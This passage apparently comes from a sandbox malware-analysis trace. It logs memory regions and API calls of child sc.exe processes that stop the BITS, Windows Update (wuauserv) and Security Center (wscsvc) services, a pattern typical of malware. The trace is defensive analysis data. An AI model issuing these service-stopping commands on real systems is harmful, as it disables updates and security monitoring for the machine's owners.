0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1049 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1050 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1051 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1052 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1053 start_va = 0x640000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 1054 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1055 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1056 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1057 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1058 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1059 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1060 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1061 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1062 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1063 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1106 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1107 start_va = 0xb0000 end_va = 0xb1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 1108 start_va = 0x310000 end_va = 0x3cffff entry_point = 0x310000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1109 start_va = 0xc0000 end_va = 0xcffff entry_point = 0xc0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 31 os_tid = 0xad8 [0021.737] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fe8c | out: lpSystemTimeAsFileTime=0x12fe8c*(dwLowDateTime=0x148f5a40, dwHighDateTime=0x1d35d7b)) [0021.737] GetCurrentProcessId () returned 0xad4 [0021.737] GetCurrentThreadId () returned 0xad8 [0021.737] GetTickCount () returned 0x148e1 [0021.738] QueryPerformanceCounter (in: lpPerformanceCount=0x12fe84 | out: lpPerformanceCount=0x12fe84*=325929937) returned 1 [0021.738] GetModuleHandleA (lpModuleName=0x0) returned 0x180000 [0021.738] __set_app_type (_Type=0x1) [0021.738] __p__fmode () returned 0x76d831f4 [0021.738] __p__commode () returned 0x76d831fc [0021.738] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1879c7) returned 0x0 [0021.738] __wgetmainargs (in: _Argc=0x189020, _Argv=0x189028, _Env=0x189024, _DoWildCard=0, _StartInfo=0x189034 | out: _Argc=0x189020, _Argv=0x189028, _Env=0x189024) returned 0 [0021.739] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.741] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0021.741] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0021.741] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0021.741] _wcsicmp (_String1="stop", _String2="query") returned 2 [0021.741] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0021.741] _wcsicmp (_String1="stop", _String2="start") returned 14 [0021.741] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0021.741] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0021.741] _wcsicmp (_String1="stop", _String2="control") returned 16 [0021.741] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0021.741] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0021.741] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x41f750 [0021.837] OpenServiceW (hSCManager=0x41f750, lpServiceName="wuauserv", dwDesiredAccess=0x20) returned 0x41f6b0 [0021.837] ControlService (in: hService=0x41f6b0, dwControl=0x1, lpServiceStatus=0x12fd88 | out: lpServiceStatus=0x12fd88*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0021.837] GetLastError () returned 0x426 [0021.837] _itow (in: _Dest=0x426, _Radix=1244452 | out: _Dest=0x426) returned="1062" [0021.837] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x426, dwLanguageId=0x0, lpBuffer=0x189380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The service has not been started.\r\n") returned 0x23 [0021.839] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x12fd0c, nSize=0x2, Arguments=0x12fd18 | out: lpBuffer="㵀B\x01") returned 0x49 [0021.840] GetFileType (hFile=0x7) returned 0x2 [0021.841] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12fce0 | out: lpMode=0x12fce0) returned 1 [0021.841] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x423d40*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x12fcfc, lpReserved=0x0 | out: lpBuffer=0x423d40*, lpNumberOfCharsWritten=0x12fcfc*=0x49) returned 1 [0021.841] LocalFree (hMem=0x423d40) returned 0x0 [0021.841] LocalFree (hMem=0x0) returned 0x0 [0021.841] CloseServiceHandle (hSCObject=0x41f6b0) returned 1 [0021.841] CloseServiceHandle (hSCObject=0x41f750) returned 1 [0021.904] exit (_Code=1062) Thread: id = 48 os_tid = 0xb70 Process: id = "10" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x63a51000" os_pid = "0xadc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xa78" cmd_line = "sc stop BITS" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 671 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 672 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 673 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 674 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 675 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 676 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 677 start_va = 0x120000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 678 start_va = 0x180000 end_va = 0x18bfff entry_point = 0x187997 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 679 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 680 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 681 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 682 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 683 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 684 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 685 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 686 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 687 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 688 start_va = 0x310000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 689 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 690 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 691 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 866 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 867 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 868 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 869 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 870 start_va = 0x510000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 871 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 872 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 873 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 874 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 875 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 876 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 877 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 878 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 879 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 880 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 881 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 882 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 883 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 884 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 885 start_va = 0x200000 end_va = 0x2bffff entry_point = 0x200000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 903 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x80000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 32 os_tid = 0xae0 [0021.298] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x15fe84 | out: lpSystemTimeAsFileTime=0x15fe84*(dwLowDateTime=0x144cb3c0, dwHighDateTime=0x1d35d7b)) [0021.298] GetCurrentProcessId () returned 0xadc [0021.298] GetCurrentThreadId () returned 0xae0 [0021.298] GetTickCount () returned 0x1472c [0021.298] QueryPerformanceCounter (in: lpPerformanceCount=0x15fe7c | out: lpPerformanceCount=0x15fe7c*=324384825) returned 1 [0021.298] GetModuleHandleA (lpModuleName=0x0) returned 0x180000 [0021.298] __set_app_type (_Type=0x1) [0021.298] __p__fmode () returned 0x76d831f4 [0021.298] __p__commode () returned 0x76d831fc [0021.298] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1879c7) returned 0x0 [0021.299] __wgetmainargs (in: _Argc=0x189020, _Argv=0x189028, _Env=0x189024, _DoWildCard=0, _StartInfo=0x189034 | out: _Argc=0x189020, _Argv=0x189028, _Env=0x189024) returned 0 [0021.299] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.302] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0021.302] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0021.302] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0021.302] _wcsicmp (_String1="stop", _String2="query") returned 2 [0021.302] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0021.302] _wcsicmp (_String1="stop", _String2="start") returned 14 [0021.302] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0021.302] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0021.302] _wcsicmp (_String1="stop", _String2="control") returned 16 [0021.302] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0021.302] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0021.302] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x51f738 [0021.304] OpenServiceW (hSCManager=0x51f738, lpServiceName="BITS", dwDesiredAccess=0x20) returned 0x51f698 [0021.304] ControlService (in: hService=0x51f698, dwControl=0x1, lpServiceStatus=0x15fd80 | out: lpServiceStatus=0x15fd80*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0021.305] GetLastError () returned 0x426 [0021.305] _itow (in: _Dest=0x426, _Radix=1441052 | out: _Dest=0x426) returned="1062" [0021.305] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x426, dwLanguageId=0x0, lpBuffer=0x189380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The service has not been started.\r\n") returned 0x23 [0021.322] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x15fd04, nSize=0x2, Arguments=0x15fd10 | out: lpBuffer="㴀R\x01") returned 0x49 [0021.488] GetFileType (hFile=0x7) returned 0x2 [0021.488] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x15fcd8 | out: lpMode=0x15fcd8) returned 1 [0021.488] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x523d00*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x15fcf4, lpReserved=0x0 | out: lpBuffer=0x523d00*, lpNumberOfCharsWritten=0x15fcf4*=0x49) returned 1 [0021.488] LocalFree (hMem=0x523d00) returned 0x0 [0021.488] LocalFree (hMem=0x0) returned 0x0 [0021.488] CloseServiceHandle (hSCObject=0x51f698) returned 1 [0021.489] CloseServiceHandle (hSCObject=0x51f738) returned 1 [0021.521] exit (_Code=1062) Thread: id = 42 os_tid = 0xb48 Process: id = "11" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x64a9a000" os_pid = "0xae4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xa28" cmd_line = "sc stop wscsvc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 692 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 693 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 694 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 695 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 696 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 697 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 698 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 699 start_va = 0x180000 end_va = 0x18bfff entry_point = 0x187997 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 700 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 701 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 702 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 703 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 704 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 705 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 706 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 707 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 708 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 709 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 710 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 711 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 712 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 886 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 887 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 888 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 889 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 890 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 891 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 892 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 893 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 894 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 895 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 896 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 897 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 898 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 899 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 900 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 901 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 902 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 904 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 905 start_va = 0x120000 end_va = 0x121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 906 start_va = 0x3f0000 end_va = 0x4affff entry_point = 0x3f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 970 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 33 os_tid = 0xae8 [0021.319] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xafcf4 | out: lpSystemTimeAsFileTime=0xafcf4*(dwLowDateTime=0x144f1520, dwHighDateTime=0x1d35d7b)) [0021.319] GetCurrentProcessId () returned 0xae4 [0021.319] GetCurrentThreadId () returned 0xae8 [0021.319] GetTickCount () returned 0x1473c [0021.319] QueryPerformanceCounter (in: lpPerformanceCount=0xafcec | out: lpPerformanceCount=0xafcec*=324459686) returned 1 [0021.319] GetModuleHandleA (lpModuleName=0x0) returned 0x180000 [0021.319] __set_app_type (_Type=0x1) [0021.320] __p__fmode () returned 0x76d831f4 [0021.320] __p__commode () returned 0x76d831fc [0021.320] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1879c7) returned 0x0 [0021.320] __wgetmainargs (in: _Argc=0x189020, _Argv=0x189028, _Env=0x189024, _DoWildCard=0, _StartInfo=0x189034 | out: _Argc=0x189020, _Argv=0x189028, _Env=0x189024) returned 0 [0021.320] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.331] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 